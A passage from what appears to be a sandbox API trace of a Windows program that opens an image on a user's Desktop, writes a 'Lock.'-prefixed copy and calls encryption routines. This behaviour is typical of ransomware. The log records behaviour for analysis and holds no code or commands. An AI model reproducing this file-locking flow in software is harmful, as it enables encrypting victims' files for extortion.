wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0156.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0156.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0156.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0156.557] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0156.557] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.557] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.557] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0156.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0156.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0156.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0156.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0156.558] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/HCYfZCy ufaMx.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\hcyfzcy ufamx.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0156.559] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.559] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0156.559] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.559] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.559] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.559] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0156.560] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.HCYfZCy ufaMx.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.hcyfzcy ufamx.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0156.670] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.670] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.670] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.670] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.674] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0156.674] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0xa57e, lpOverlapped=0x0) returned 1 [0156.677] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0156.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0156.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0156.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0156.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0156.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa57e) returned 0x2f14010 [0156.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3de2020 | out: hHeap=0x970000) returned 1 [0156.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0156.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0156.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0156.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0156.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0156.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0156.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0156.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0156.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa57e) returned 0x2f1e598 [0156.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0156.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0156.792] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0156.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0156.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0156.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0156.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0156.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa57e) returned 0x2f14010 [0156.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0156.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0156.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0156.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0156.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0156.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0156.795] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0156.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0156.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0156.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0156.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0156.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0156.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0156.795] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0156.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0156.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0156.795] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0156.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0156.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0156.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0156.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0156.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0156.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0156.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0156.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0156.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa57e) returned 0x2f14010 [0156.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0156.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0156.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0156.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0156.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0156.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0156.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0156.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0156.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0156.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0156.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0156.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0156.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0156.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0156.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0156.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0156.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0156.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0156.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0156.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa57e) returned 0x2f28b20 [0156.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0156.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0156.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0156.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0156.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0156.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0156.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0156.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0156.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0156.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0156.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0156.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0156.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0156.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0156.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0156.803] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0156.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0156.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0156.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0156.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0156.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0156.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0156.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0156.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0156.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0156.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0156.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0156.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0156.803] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0156.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0156.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0156.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0156.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0156.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0156.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0156.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0156.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0156.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0156.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0156.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0156.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0156.804] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0156.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0156.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0156.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0156.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0156.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0156.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0156.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0156.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0156.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0156.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0156.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0156.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0156.804] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0156.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0156.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0156.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0156.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0156.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0156.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0156.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0156.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0156.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0156.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0156.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0156.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0156.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0156.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0156.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0156.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0156.805] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0156.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0156.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0156.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0156.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0156.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0156.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0156.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0156.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0156.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0156.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0156.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0156.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0156.806] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0156.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0156.806] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0156.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0156.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0156.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0156.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0156.806] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0156.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0156.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd88 [0156.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0156.806] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0156.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd88 | out: hHeap=0x970000) returned 1 [0156.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0156.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0156.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0156.807] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0156.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0156.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0156.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0156.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0156.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0156.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0156.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0156.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0156.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0156.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0156.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0156.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0156.807] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0156.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0156.807] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0156.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0156.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0156.807] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0156.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0156.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0156.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 